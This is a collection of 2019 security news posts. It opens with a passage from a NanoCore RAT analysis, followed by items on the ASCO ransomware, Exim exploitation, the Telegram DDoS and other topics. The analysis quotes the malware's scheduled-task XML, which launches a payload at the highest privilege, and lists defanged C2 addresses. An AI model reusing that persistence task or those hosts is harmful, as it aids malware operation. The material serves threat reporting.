<?xml version=”1.0″ encoding=”UTF-16″?><Task version=”1.2″ xmlns=””>  <RegistrationInfo />  <Triggers />  <Principals>    <Principal id=”Author”>      <LogonType>InteractiveToken</LogonType>      <RunLevel>HighestAvailable</RunLevel>    </Principal>  </Principals>  <Settings>    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>    <AllowHardTerminate>true</AllowHardTerminate>    <StartWhenAvailable>false</StartWhenAvailable>    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>    <IdleSettings>      <StopOnIdleEnd>false</StopOnIdleEnd>      <RestartOnIdle>false</RestartOnIdle>    </IdleSettings>    <AllowStartOnDemand>true</AllowStartOnDemand>    <Enabled>true</Enabled>    <Hidden>false</Hidden>    <RunOnlyIfIdle>false</RunOnlyIfIdle>    <WakeToRun>false</WakeToRun>    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>    <Priority>4</Priority>  </Settings>  <Actions Context=”Author”>    <Exec>      <Command>”C:\Users\admin\Desktop\trasferimento.exe”</Command>      <Arguments>$(Arg0)</Arguments>    </Exec>  </Actions></Task>

The difference between the two scheduled tasks is the fact that one references “trasferimento.exe” process and the other one references “non.exe” process. It seems to be a sort of a survival mechanism in which both the processes work and keep the infection alive.

Figure 8: Details about set task scheduler

These two processes contact two different C2s. During the analysis one of them (185.244.31.[50)  was down and the other one (79.134.225[.41) continues to work.

Figure 9: Communication with two different C2

NanoCore Client

ThreatNanocore RAT
Brief DescriptionNanoCore RAT client

Table 2: Information about “non.exe” NanoCore RAT

At this point, let’s start to analyze the “non.exe” file which is the Nanocore RAT Client, even this one is compiled in .NET language.

Figure 10: Other information about “non.exe” NanoCore RAT and relative compiled language

The de-compiled code is quite obfuscated and encrypted with some custom routines.

Figure 11: Version of NanoCore Client

The real nature of the payload is revealed after few steps of debugging, we extracted also the current version:, as highlighted in the red square. Going ahead with debugging, we found  a recurrent routine used to decrypt RAT’s static strings and the malware configuration too:

Figure 12: Decryption routine to extract the configuration file

Like other crimeware, also this one leverages encrypted configuration only decrypted during the malware execution. Interestingly, the extracted configuration does not include persistence, which is however guaranteed by the scheduled task handled by the external wrapper.

Figure 13: Configuration information of the RAT client

As we can see from the above figure, this client has some interesting enabled features, like the capability to bypass the UAC control, or prevent the system to go to sleep. Moreover, the primary and backup C2 are the same and the solution of the backup C2 is guaranteed through the other “trasferimento.exe” RAT mode process.


Nowadays a lot of cyber criminals don’t strive to write malware from scratch because there already are a vastity of public tools suitable for this need. From the attacker point of view, the problem about the usage of these tools is the fact they sooner or later will be recognized by the Anti-Virus engines.

Therefore, attackers adopt other technologies like packers and obfuscators, many time publicly available too, or write down custom loaders to hide their espionage tools, keeping them running into victim machines for a long time, silently observing their targets and awaiting the right time to act their criminal plans.

Technical details, including IoCs and Yara Rules, are available in the analysis published in the Yoroi blog.

Pierluigi Paganini

(SecurityAffairs – NanoCore, malware)

The post Dissecting NanoCore Crimeware Attack Chain appeared first on Security Affairs.

Aviation Equipment Major ASCO Victim of Ransomware Attack

The Belgian manufacturer of aeronautical equipment ASCO was forced to close its operations in Belgium, Germany, Canada and the United States after a ransomware attack at its Zaventem plant in Belgium.

ASCO is one of the world’s largest manufacturers of aeronautical equipment and provides high-end aeronautical equipment, such as lifting devices, mechanical assemblies and functional components, to various aviation giants such as Boeing. Airbus, Lockheed Martin, Bombardier Aerospace and Embraer.

The computer systems at the Zaventem plant in Belgium, which also serves as headquarters, were attacked last Friday by a ransomware attack, forcing the company to close its factories in Belgium, Germany, Canada and the United States to mitigate the impact of the attack.

ASCO employees sent on leave for an indefinite period

ASCO, acquired last year by the American company Spirit AeroSystems, also sent about 1,000 of its 1,400 employees to these factories due to an extended shutdown and was asked not to return to work until new order. However, the company’s non-production offices in France and Brazil are currently operational.

ASCO has not yet issued any official statement regarding the attack on ransomware, nor has it communicated the details of the ransom demand, that the company intends to respond to the complaint or that the infection has caused the loss of intellectual property secrets. However, the company told the Brussels Times that it had not yet detected any theft or loss of information.

Andrea Carcano, CPO of the co-founder of Nozomi Networks, warned that it was never advisable to pay ransom in these situations. “There is no guarantee that criminals will restore the systems. Organizations must prepare for this type of event and have a plan to limit the damage and the reputation of the brand.

The attack comes two months after the European Commission approved the acquisition of the company by Spirit Aerosystems, based in the United States. The acquisition in cash of SRIF, the parent company of the Belgian-based aircraft components manufacturer, for a total amount of $ 650 million (£ 512 million) was announced in May 2018

The first EU regulatory review was stopped in October 2018 when Spirit withdrew its first contract notice to the Commission due to regulatory concerns. The company resumed the regulatory process in February 2019 after informing the European Commission on 30th January.

There was no press release or announcement from both companies. The LinkedIn and Twitter accounts of both companies did not provide any confirmation or acknowledgment of the attack until the report was released.

The aeronautics industry has been the target of hackers recently. When an airline is purchased, the new owner is more likely to go with the legacy systems instead of integrating them and updating them completely. New airlines are better equipped and have control on their IT system.

In terms of ransomware, prevention is better than cure. Keep all your systems are up-to-date with the latest patches and that there are no security vulnerabilities or that can leave an organization exposed to attackers.

Also, Read:

Ransomware Attack Impacts Baltimore Emails, Online Payments

FBI Investigating Baltimore Ransomware Attack


The post Aviation Equipment Major ASCO Victim of Ransomware Attack appeared first on .

Linux servers under attack via latest Exim flaw

It didn’t take long for attackers to start exploiting the recently revealed Exim vulnerability (CVE-2019-10149). Active campaigns One security enthusiast detected exploitation attempts five days ago: Just detected the first attempts to exploit recent #exim remote command execution (RCE) security flaw (CVE-2019-10149). Tries to downloads a script located at (careful). If you run Exim, make sure it's up-to-date. @qualys — Freddie Leeman (@freddieleeman) June 9, 2019 Amit Serper, Cybereason’s head of security research, … More

The post Linux servers under attack via latest Exim flaw appeared first on Help Net Security.

French Ministry of Interior Releases Decryptor for PyLocky Versions 1 & 2

The French Ministry of Interior has released a decryption utility for versions 1 and 2 of PyLocky ransomware to the public. On 11 June, the ministry of the French government unveiled the tool as the product of collaboration between its various agencies, including the Brigade d’enquêtes sur les fraudes aux technologies de l’information (BEFTI) of […]… Read More

The post French Ministry of Interior Releases Decryptor for PyLocky Versions 1 & 2 appeared first on The State of Security.

Video Surveillance by Computer

The ACLU's Jay Stanley has just published a fantastic report: "The Dawn of Robot Surveillance" (blog post here) Basically, it lays out a future of ubiquitous video cameras watched by increasingly sophisticated video analytics software, and discusses the potential harms to society.

I'm not going to excerpt a piece, because you really need to read the whole thing.

Home Secretary Signs Assange US Extradition Request

Home Secretary Signs Assange US Extradition Request

The UK home secretary Sajid Javid has approved an extradition request from the US for WikiLeaks founder Julian Assange to be extradited.

The Tory leadership hopeful told BBC Radio 4’s Today program on Thursday that the controversial figure is one step closer to a trial on US soil, where he faces an 18-count indictment.

“He’s rightly behind bars. There’s an extradition request from the US that is before the courts tomorrow but yesterday I signed the extradition order and certified it and that will be going in front of the courts tomorrow,” said Javid.

“It is a decision ultimately for the courts, but there is a very important part of it for the home secretary and I want to see justice done at all times and we’ve got a legitimate extradition request, so I’ve signed it, but the final decision is now with the courts.”

The Department of Justice initially indicted Assange on hacking offenses related to Chelsea Manning’s alleged unauthorized access of Pentagon computers to access classified information.

However, that was superseded by a new 18-count court order detailing charges related to Assange’s publishing of that classified info, which it is alleged harmed national security.

The trove of hundreds of thousands of secret diplomatic cables and other documents relating to US wars in Afghanistan and Iraq contained unredacted names of US informants and diplomats in those countries, allegedly putting their physical safety at risk.

However, press freedom advocates have warned that the charges could set a dangerous precedent, given that WikiLeaks was acting in the public interest in revealing US military cover-ups such as the accidental shooting of two Iraqis working for Reuters news agency in 2007.

It’s also claimed that as Assange is not a US citizen and his crimes were not committed on US soil, he should not be facing extradition.

Former editor of the Guardian, Alan Rusbridger, claimed the charges are “attempting to criminalize things journalists regularly do as they receive and publish true information given to them by sources or whistleblowers.”

However, Assange has also been a controversial figure: his decision to publish private emails hacked by alleged Russian state spies from Democratic Party officials is said to have given Donald Trump a key advantage in the 2016 race for the White House.  

Vulnerabilities allow attackers to take over infusion pumps

Two vulnerabilities in Windows CE-powered Alaris Gateway Workstations (AWGs), which provide support for widely used infusion pumps, could allow remote attackers to disable the device, install malware, report false information, and even instruct the pumps to alter drug dosages and infusion rates. About Alaris Gateway Workstations Developed by US-based medical device maker Becton, Dickinson and Company (BD), Alaris Gateway Workstations are deployed in healthcare establishments in Europe and Asia. A company spokesperson told TechCrunch that … More

The post Vulnerabilities allow attackers to take over infusion pumps appeared first on Help Net Security.

Millions of Email Servers at Risk from Cryptomining Worm

Millions of Email Servers at Risk from Cryptomining Worm

Researchers have spotted a major new cyber-attack campaign targeting millions of Linux email servers around the world with a cryptomining malware payload.

Exim accounts for over half (57%) of the globe’s internet email servers. Over 3.5 million are at risk from a vulnerability discovered last week, CVE-2019-10149, according to security vendor Cybereason.

There appears to be two waves of attack: the first involved attackers initially pushing out exploits from a command and control (C2) server on the clear web. However, the second seems to be more sophisticated.

“This is a highly pervasive campaign that installs cron jobs for persistence and downloads several payloads for different stages of the attack. In one of those stages, one of the payloads is a port scanner written in python. It looks for additional vulnerable servers on the internet, connects to them, and infects them with the initial script,” wrote Cybereason.

“In the attack, the attackers add an RSA authentication key to the SSH server which allows them to connect to the server as root and own it completely.”

Researchers are still working to assess the breadth of the campaign, but with worm-like capabilities in play, system administrators are urged to patch their Exim servers now, as well as find and remove any cron jobs.

“It is clear that the attackers went to great lengths to try to hide the intentions of their newly-created worm. They used hidden services on the TOR network to host their payloads and created deceiving windows icon files in an attempt to throw off researchers and even system administrators who are looking at their logs,” concluded Cybereason. 

“The prevalence of vulnerable Exim servers allows attackers to compromise many servers in a relatively short period of time, as well as generate a nice stream of cryptocurrency revenue.”

Yubico is replacing for free YubiKey FIPS devices due to security weakness

Yubico is replacing YubiKey FIPS security keys due to a serious flaw that makes cryptographic operations easier to crack under specific conditions.

Yubico is replacing YubiKey FIPS security keys due to a serious issue that flaw that makes it easier to crack RSA keys and ECDSA signatures generated on these devices.

The security advisory published by the company states that the issue impacts YubiKey series devices running versions 4.4.2 and 4.4.4 of the firmware. The weakness impacts PIV smart card applications, Universal 2nd Factor (U2F) authentication, OATH one-time passwords, and OpenPGP. Nano FIPS, C FIPS and C Nano FIPS devices are also impacted by the weakness.

“An issue exists in the YubiKey FIPS Series devices with firmware version 4.4.2 or 4.4.4 (there is no released firmware version 4.4.3) where random values leveraged in some YubiKey FIPS applications contain reduced randomness for the first operations performed after YubiKey FIPS power-up,” reads the advisory published by Yubico.

“The issue only affects certain use cases and scenarios. YubiKey FIPS applications utilizing ECDSA are at higher risk than other use cases.”

Some YubiKey FIPS applications leverage on ransom values that contain reduced randomness for the first operations performed after devices power-up.

“The buffer holding random values contains some predictable content left over from the FIPS power-up self-tests which could affect cryptographic operations which require random data until the predictable content is exhausted,” continues the advisory.

Yubico discovered the flaw in March and addressed it with the release of the firmware version 4.4.5 that was certified at the end of April.

At the time, there is no news of attacks exploiting the issue in the wild.

Yubico is contacting its customers to inform them of the free device replacement. The company said that most of the affected security keys have already been replaced or are in the process of being replaced.

People who bought their devices from a reseller should contact them and ask for the drives replacement.

Pierluigi Paganini

(SecurityAffairs – Yubico, hacking)

The post Yubico is replacing for free YubiKey FIPS devices due to security weakness appeared first on Security Affairs.

MI5 Breached Surveillance Law for Years

MI5 Breached Surveillance Law for Years

MI5’s breaches of the law in its handling and retention of bulk surveillance data are much worse than first thought, according to new legal documents revealed as part of an ongoing case.

Rights group Liberty is challenging outgoing Prime Minister Theresa May’s flagship Snoopers’ Charter, aka the Investigatory Powers Act (IPA): a law which allows the security services to hack devices and intercept communications en masse, collecting and storing info on countless innocent citizens.

Last month it was revealed that MI5 had breached IPA safeguards, something home secretary Sajid Javid described as “compliance risks” that require “serious and required immediate mitigation.”

However, this week Liberty disclosed 10 further documents and letters from MI5 and watchdog the Investigatory Powers Commissioner (IPCO) detailing “undoubtedly unlawful” conduct from the security service for as long as the IPA has been in existence.

“Without seeking to be emotive, I consider that MI5’s use of warranted currently, in effect, in ‘special measures’ and the historical lack of compliance... is of such gravity that IPCO will need to be satisfied to a greater degree than usual that it is ‘fit for purpose',” the commissioner wrote in one.

MI5 failed to safeguard citizens’ privacy by, for example, destroying material in a timely manner or protecting legally privileged material, and knew about such “compliance gaps” for three years before telling the IPCO, according to Liberty.

MI5’s false assurances extended to its maintaining to senior judges that data handling obligations were being met, resulting in warrants for bulk surveillance being issued that otherwise would not have been forthcoming.

The new evidence also revealed that personal data collected by MI5 is being stored in “ungoverned spaces,” and that the intelligence service’s lawyers claim there is “a high likelihood [of it] being discovered when it should have been deleted, in a disclosure exercise leading to substantial legal or oversight failure.”

The government is now trying to minimize the fallout from more damaging revelations by applying for further details to be provided to the court through private hearings.

“These shocking revelations expose how MI5 has been illegally mishandling our data for years, storing it when they have no legal basis to do so. This could include our most deeply sensitive information – our calls and messages, our location data, our web browsing history,” argued Liberty lawyer, Megan Goulding.

“It is unacceptable that the public is only learning now about these serious breaches after the government has been forced into revealing them in the course of Liberty’s legal challenge. In addition to showing a flagrant disregard for our rights, MI5 has attempted to hide its mistakes by providing misinformation to the Investigatory Powers Commissioner, who oversees the government’s surveillance regime.”

Weekly Update 143

Weekly Update 143

Well this was a big one. The simple stuff first - I'm back in Norway running workshops and getting ready for my absolute favourite event of the year, NDC Oslo. I'm also talking about Scott's Hack Yourself First UK Tour where he'll be hitting up Manchester, London and Glasgow with public workshops. Tickets are still available at those and it'll be your last chance for a long time to do that event in the UK.

Then there's Project Svalbard. I think it'll come across in the video below, but putting a project I've poured my heart and soul into over the last 5 and half year up for sale is a massive thing for me. There are so many emotions involved at so many levels and I really wanted to try and get that across in a more personable form than what written word lends itself to. I hope I've done that, and I hope you enjoy listening to the back story of Project Svalbard. Here it is:

Weekly Update 143
Weekly Update 143
Weekly Update 143


  1. Scott's public Hack Yourself First UK Tour is coming up (Manchester, London and Glasgow - get on it!)
  2. Project Svalbard (the big one - this is a long weekly update mostly about my decision to move HIBP into another organisation)
  3. Twilio is sponsoring my blog this week (learn what regulations like PSD2 mean for your business, and how Twilio can help you achieve secure, compliant transactions)

Millions of Exim mail servers are currently under attack

Hackers are targeting millions of mail servers running vulnerable Exim mail transfer agent (MTA) versions, threat actors leverage the CVE-2019-10149 flaw.

Millions of mail servers running vulnerable Exim mail transfer agent (MTA) versions are under attack, threat actors are exploiting the CVE-2019-10149 flaw to take over them.

A critical vulnerability affects versions 4.87 to 4.91 of the Exim mail transfer agent (MTA) software. The flaw could be exploited by unauthenticated remote attackers to execute arbitrary commands on mail servers for some non-default server configurations.

The CVE-2019-10149 issue resides in the deliver_message() function in /src/deliver.c and it is caused by the improper validation of recipient addresses. The issue could lead to remote code execution with root privileges on the mail server.

The flaw is easily exploitable by a local and a remote attacker in certain non-default configurations, experts believe that threat actors will start using it in attacks in the wild.

The CVE-2019-10149 flaw was addressed the Exim’s development team with the release of version 4.92 in February. Unfortunately, a large number of operating systems are still affected by the vulnerability.

Querying Shodan for vulnerable versions of Exim it is possible to find 3,655,524 installs most of them in the United States (1,984,5538).
Searching for patched Exim installs running the 4.92 release we can find 1,795,332 systems.


CVE-2019-10149, which was first discovered on June 5, is now being used as the vulnerability for a widespread campaign to attack exim servers and propagate across the Internet.” reads a blog post published by Cybereason..

“We are aware of an initial wave of attacks as described by Freddie Leeman on June 9, 2019. The first hacker group began pushing exploits from a C2 server located on the clear web. A second round of attacks by a different attacker are being analyzed by the Nocturnus team.”

Attackers are scanning the internet for vulnerable mail servers then when they will be compromised the initially deployed script will download a second script designed to check if OpenSSH is installed on the compromised machine.

In case OpenSSH is not present, it will install it and start it to gain root logins via SSH using a private/public RSA key for authentication.

Experts also observed another campaign carried out by a second group of attackers that is also targeting Exim servers.

The second stream of attacks was spotted by Freddie Leeman on June 9, in this wave of attacks attackers were delivering the script used to exploit vulnerable Exim servers from 173[.]212[.]214[.]137/s.

“During the subsequent days, this group evolved its attacks, changing the type of malware and scripts it would download on infected hosts; a sign that they were still experimenting with their own attack chain and hadn’t settled on a particular exploit method and final goal.” reported ZDnet.

The attackers behind this second stream used multiple variants and continuously changed the scripts.

Pierluigi Paganini

(SecurityAffairs – Exim, hacking)

The post Millions of Exim mail servers are currently under attack appeared first on Security Affairs.

New infosec products of the week: June 14, 2019

Skybox Security Suite 10 to simplify enterprise security management processes Skybox Security Suite 10 brings an intuitive, customizable user experience to simplify management of vulnerabilities, security policies, firewalls and changes from a central solution. Cloud and operational technology (OT) security insights are integrated seamlessly for uniform risk management across hybrid networks. SecBI extends its threat detection solution with automated response SecBI announced the extension of its agent-less, threat detection solution with automated response. Now security … More

The post New infosec products of the week: June 14, 2019 appeared first on Help Net Security.

Gaming Industry An Attractive Target For Cybercriminals

The gaming industry, in general, is aware that attempts to login and other forms credential abuse is a problem. But maybe not as aware that they should be.

According to a new Akamai report, hackers are using new methods to evade detection. Many organizations do not follow the scope and complexity of the problem of identity theft.

The State of the Internet Report: The Company’s 2019 Web Gambling and Gambling Abuse Web Sites, published at the annual Akamai Edge World event, revealed that hackers had made more than 12 billion attacks in gaming site between late 2017 and March of this year, qualifying the gamer community as one of the most aggressive targets for these attacks and one of the most lucrative for cybercriminals.

In total, gambling sites accounted for more attacks aimed at obtaining identification information in all sectors during the investigation period by Akamai.

“One reason that we believe the gaming industry is an attractive target for hackers is that criminals can easily exchange in-game items for profit,” said Martin McKeay, security researcher for Akamai and editorial director of the report. “Furthermore, gamers are a niche demographic known for spending money, so their financial status is also a tempting target.”

The Akamai report also pointed out that SQL injection attacks (SQLi) accounted for about two-thirds of all Web application attacks, while Local File Inclusion (LFI) attacks accounted for about a quarter.

The report points out that most credential stuffing lists circulate online usage data from well-known large-scale data breaches, and that many of them are rooted in SQLi.

An Akamai press release says its researchers have discovered a video explaining to users how to perform SQLi attacks against websites and using the credentials obtained to generate lists that can be used for the credential stuffing against online games.

“As gaming companies continue to innovate and improve their defenses, they must also continue to educate their consumers on how to protect themselves and defend themselves. Many players are young and if they learn best practices to protect their accounts, they will incorporate them for the rest of their lives,” McKeay said.

The Akamai report shows that more than two-thirds of application layer attacks are directed against US-based organizations, and Russia and Canada occupy positions No. 1 and No. 2 for the gambling sector, in terms of sources of attack. “Attackers see the credential abuse as a low-risk venture with a potential for a high payout, at least for now,” Akamai’s report reads. “

The report notes that hackers tend to give more value to compromised accounts related to valid credit cards and other financial links. Once these accounts are compromised, they will buy additional items, including the currencies used in the games.

These types of attacks are more likely to increase in the future. As with many other types of attacks, the important thing is that a user should keep in mind that attacks occur so that you can find ways to defend your business against them.

Related Resources:

Best 5 Nintendo 3DS Emulator for Android, iOS & PC

The post Gaming Industry An Attractive Target For Cybercriminals appeared first on .

Organizations are advancing their efforts, investing in OT cybersecurity programs

ICS cybersecurity threats remain high and present evolving challenges, a new SANS report reveals. However, since the last SANS OT/ICS report released in 2017, a growing majority of organizations have significantly matured their security postures over the last two years and are adopting strategies that address OT/IT convergence. “The findings in this latest SANS report make it clear that 2019 is the year for ICS cybersecurity,” said Nozomi Networks CEO Edgard Capdevielle. “We see the … More

The post Organizations are advancing their efforts, investing in OT cybersecurity programs appeared first on Help Net Security.

Organizations need capabilities and practices to generate value from AI

Businesses actively embracing artificial intelligence and striving to bring technological advancements into their operations are reaping dividends not seen by companies who fail to properly adapt and adopt. While most business and technology leaders are optimistic about the value-creating potential of AI in their enterprise – Enterprise Cognitive Computing (ECC) – the actual rate of adoption is low, and benefits have proved elusive for a majority of organizations. A study involving Lancaster University Management School’s … More

The post Organizations need capabilities and practices to generate value from AI appeared first on Help Net Security.

The gaming community is a rising target for credential stuffing attacks

Hackers have targeted the gaming industry by carrying out 12 billion credential stuffing attacks against gaming websites within the 17-month period analyzed in the report (November 2017 – March 2019) by Akamai. 55 billion credential stuffing attacks This puts the gaming community among the fastest rising targets for credential stuffing attacks and one of the most lucrative targets for criminals looking to make a quick profit. During the same time period, Akamai saw a total … More

The post The gaming community is a rising target for credential stuffing attacks appeared first on Help Net Security.

5G subscriptions to reach 1.9 billion in 2024, critical IoT connections on the rise

Rapid early momentum and enthusiasm for 5G has led Ericsson to forecast an extra 400 million enhanced mobile broadband subscriptions globally by the end of 2024. The June 2019 edition of the Ericsson Mobility Report forecasts 1.9 billion 5G subscriptions – up from 1.5 billion forecasted in the November 2018 edition – an increase of almost 27 percent. Other forecasts have also increased notably as a result of the rapid 5G uptake. 5G coverage is … More

The post 5G subscriptions to reach 1.9 billion in 2024, critical IoT connections on the rise appeared first on Help Net Security.

Stop Discarding Devices Frequently- It’s Risky for Mother Earth as Well As Your Cybersecurity

Aunty, do you happen to have any waste paper at home? I need them for my Environment Day project,” chirped a bright little thing standing at my door early Sunday morning.

I am sure I have. What is your project this year?”

Oh! I want to emphasize on ‘Reduce. Reuse. Recycle.’ by making durable paper bags that people can pack their gifts in. It will also reduce the use of plastic.”

We need more such efforts on the part of all producers, consumers and recyclers to restore the balance on earth, which we have sadly turned into a dump yard of toxic waste that is polluting our land, water and air. The matter is serious and calls for judicious purchase and use of goods.

This Environment day, why not pledge to reduce e-waste, digital citizens?

What is e-waste?

Electronic waste or e-waste describes discarded electrical or electronic devices. Used electronics which are destined for refurbishment, reuse, resale, salvage, recycling through material recovery, or disposal are also considered e-waste.

Which means all your obsolete devices and electronic goods, that are lying around at home or been thrown away in bins, make up e-waste.

Why is there a rise in e-waste?

The volume of annual e-waste is on the rise, thanks to the desire for latest models fueled by the rise in disposable income, technological progress and cheap data rates. Gone are those thrifty days when we purchased goods to last; now we want only the smartest and latest.

Consider this: The Global E-Waste Monitor, 2017 published by the United Nations University estimated that India generates about 2 million metric tons of e-waste annually, of which almost 82% comprises of personal devices!

Why are we worried about e-waste?

We want the Earth to continue being the clean, green and beautiful planet that it is, right? But the increasing amount of e-waste is a threat to the environment. If not processed properly, it can have negative effects on pollution levels and consequently on the health of all life forms. Toxicity in soil will affect soil fertility, and hence crop production. We have already witnessed the effect of plastics and toxic fumes from incinerators on birds and animal life.

How is e-waste connected to cybersecurity?

Improper disposal of devices can also pose a security risk. If you have not taken the trouble to delete all the content and reset to factory settings, then your data, including photos may fall in wrong hands and could be misused. Before you give or throw away old devices, take care to thoroughly clean content and unsync from other devices.

How to reduce e-waste?

This is your Environment Day Mantra: Reduce. Recycle. Refurbish. Reuse.

Every time you desire to replace an electronic item, ask yourself, ‘Is it really necessary to purchase it now or can it be postponed? Am I doing it to keep up with or ahead of the Joneses? What will I do with the old product?’ Such soul-searching often leads to sane decisions that you will not regret later.

With that in mind, and the following tips handy, you can become a positive contributor to keeping the environment clean.

  1. Keep your devices in top condition: The two most common devices to be found in homes across India are the computer (or laptop) and smartphone. Replace slow batteries and keep them secured. Carry out regular scans and clean-ups and install all software updates.
  2. Protect your phone from damage: Use a screen guard and phone cases to reduce chances of breakage. Your kids can choose trendy cases that will serve two purposes: protect their phones as well as encourage them to use the devices for a longer period
  3. Battery life: Avoid overcharging the battery to extend battery life
  4. Secure your products: Use licensed security tools to remove malware and optimize performance

Some countries offer financial incentives to return old devices at designated collection centres. Perhaps we should start something like this to encourage people to recycle?

Things You Can Do This Environment Day:

Still not found a suitable project for Environment Day? Why not go on a collection drive of gaming devices and mobile phones that your neighbours have lying at home. You can then clean them and get in touch with a reputed NGO to channel these gaming devices to children’s homes, domestic help and others. Think about it.



The post Stop Discarding Devices Frequently- It’s Risky for Mother Earth as Well As Your Cybersecurity appeared first on McAfee Blogs.

Significant trends are beginning to develop in the Government ID market

The worldwide installed base of both smart and legacy credentials will grow from 9.8 billion in 2018 to 11.5 billion in 2023, according to ABI Research. With increased rates of international travel and government focus shifting to border control and security of citizen’s data, significant regional and innovation trends are beginning to develop in the Government ID market. “When it comes to regions, identifiable trends are emerging as it pertains to the objectives that credential … More

The post Significant trends are beginning to develop in the Government ID market appeared first on Help Net Security.

Threat Stack and JASK speeding incident response times, improving productivity

Threat Stack, the leader in cloud security and compliance for infrastructure and applications, and JASK, the provider of the industry’s first cloud-native SIEM platform, announced a partnership designed to help security operations teams reduce the time and effort needed to detect and respond to cloud security incidents identified by the Threat Stack Cloud Security Platform. “Cloud sprawl is a major issue with businesses that creates blind spots for IT and security teams,” said Rob Fry, … More

The post Threat Stack and JASK speeding incident response times, improving productivity appeared first on Help Net Security.

Securitas and Purdue University Global offer employee security certificate programs

Securitas Security Services USA, the knowledge leader in the protective services industry, announced an exclusive partnership with Purdue University Global to offer four security certificate programs to enhance the knowledge and skills of its security officers, and significant financial benefits to assist officers in earning associate and bachelor degrees. Purdue Global, a public, accredited nonprofit online institution of higher education, developed the 20-credit certificate programs in partnership with Securitas for the following areas of expertise: … More

The post Securitas and Purdue University Global offer employee security certificate programs appeared first on Help Net Security.

NFC Forum expands connectivity for IoT device manufacturers

The NFC Forum announced the publication of the new Tag NFC Data Exchange Format Exchange Protocol Candidate Specification (TNEP) and a new candidate version of its popular Connection Handover Technical Specification (CH 1.5). The TNEP candidate specification is the first of its kind to simplify the bidirectional exchange of data between an NFC-enabled phone and an IoT device. When combined with the TNEP, CH 1.5 enables new Near Field Communication (NFC), Bluetooth and Wi-Fi negotiated … More

The post NFC Forum expands connectivity for IoT device manufacturers appeared first on Help Net Security.

Wipro and Moogsoft delivering AIOps solutions for customers

Wipro, a leading global information technology, consulting and business process services company and Moogsoft, a pioneer and leading provider of artificial intelligence for IT operations (AIOps), announced a partnership. Wipro will leverage Moogsoft’s industry-leading platform to deliver next-generation artificial intelligence for IT operations (AIOps) solutions for its customers. Moogsoft’s AIOps platform, powered by purpose-built Machine Learning (ML) algorithms, helps IT teams in the real-time detection and remediation of IT incidents across applications, networks and IT … More

The post Wipro and Moogsoft delivering AIOps solutions for customers appeared first on Help Net Security.

WAGO Industrial Switches affected by multiple flaws

A security expert at SEC Consult discovered that some WAGO industrial managed switches are affected by several serious vulnerabilities.

A security researcher at consulting company SEC Consult discovered several vulnerabilities in some models of WAGO industrial switches.

The vulnerabilities affect WAGO industrial switches 852-303, 852-1305 and 852-1505 models. The company has already fixed the issues with the release of firmware versions 1.2.2.S0, 1.1.6.S0 and 1.1.5.S0, respectively.

“The industrial managed switch series 852 from WAGO is affected by multiple vulnerabilities such as old software components embedded in the firmware. Furthermore, hardcoded password hashes and credentials were also found by doing an automated scan with IoT Inspector.” reads the security advisory. “Two vulnerabilities (CVE-2017-16544 and CVE-2015-0235) were verified by emulating the device with the MEDUSA scaleable firmware runtime. The validity of the password hashes and the embedded keys were also verified by emulating the device.

One of the most severe issues is related to the presence of hardcoded credentials that can be used to connect the devices via Telnet and SSH.

“Hardcoded Credentials (CVE-2019-12550) – The device contains hardcoded users and passwords which can be used to login via SSH and Telnet.” continues the advisory.

The expert also found hardcoded private keys for the SSH daemon in the device’s firmware. An attacker can use them to carry out man-in-the-middle (MitM) attacks against the Dropbear SSH daemon without the victim noticing any fingerprint changes.

“The device contains hardcoded private keys for the SSH daemon. The fingerprint of the SSH host key from the corresponding SSH daemon matches to the embedded private key.” states the advisory.

SEC Consult also discovered that WAGO industrial switches use outdated versions of the BusyBox UNIX toolkit and the GNU C Library (glibc). Both libraries are affected by known vulnerabilities, some of which rated as critical.

Experts suggest restricting network access to the device and SSH server in order to protect the system. The good news is that affected switches are not exposed online.

The German VDE CERT has published an advisory to warn of the flaws in the WAGO devices.

Pierluigi Paganini

(SecurityAffairs – Wago industrial switches, hacking)

The post WAGO Industrial Switches affected by multiple flaws appeared first on Security Affairs.

Fifty States, Fifty laws

The big news lately is that individual states are proposing their own privacy laws. California has the California Consumer Protection Act and now New York and Maine have also proposed laws. There has been discussion of a federal law, however it seems unlikely that any kind of landmark legislation on privacy passes through to be […]

The post Fifty States, Fifty laws appeared first on Privacy Ref Blog.

Telegram Recovers from DDoS Attack

Telegram Messenger, which had suffered a DDoS (Distributed Denial of Service) attack recently, has reportedly recovered from the same and everything now seems stabilized, as per reports.

A ZDNet report, dated June 13, 2019, says, “Telegram Messenger has recovered from a distributed denial of service (DDoS) attack that hit its platform on Wednesday, telling its 200 million-plus users that for the moment, things seem to have stabilised.”

On June 12, Telegram had intimated users via Twitter about the DDoS attack. The Tweet said, “We’re currently experiencing a powerful DDoS attack, Telegram users in the Americas and some users from other countries may experience connection issues.”

Telegram even explained, in a rather funny and interesting manner, to users as to how DDoS attacks work- “A DDoS is a “Distributed Denial of Service attack”: your servers get GADZILLIONS of garbage requests which stop them from processing legitimate requests. Imagine that an army of lemmings just jumped the queue at McDonald’s in front of you – and each is ordering a whopper… The server is busy telling the whopper lemmings they came to the wrong place – but there are so many of them that the server can’t even see you to try and take your order.”

The users were also told how cybercriminals use botnets to make a DDoS attack almost similar to a “zombie apocalypse”, and also that it’s just about overloading the servers, thereby not at all impacting data security.
Eventually, Telegram told users that everything is ok and that things seem to have stabilized.

The fact that the timing of the DDoS attack on Telegram coincided with the Hong Kong extradition law protests organized on the platform has been pointed out. There are inferences that the attack was launched mostly from China. Telegram founder and CEO Pavel Durov has tweeted, “IP addresses coming mostly from China. Historically, all state actor-sized DDoS (200-400 Gb/s of junk) we experienced coincided in time with protests in Hong Kong (coordinated on @telegram). This case was not an exception.”

Massive and violent protests are going on in Hong Kong opposing the government’s plans to pass a bill that would allow extraditions to China. The protests were largely organized on Telegram, Facebook, Twitter and other messaging apps, like WhatsApp and Signal. The South China Morning Post had reported that protestors were using encrypted messenger apps to organize themselves, share intelligence and avoid police detection. The report also says that a Telegram group administrator was arrested on suspicion of conspiracy to commit public nuisance.

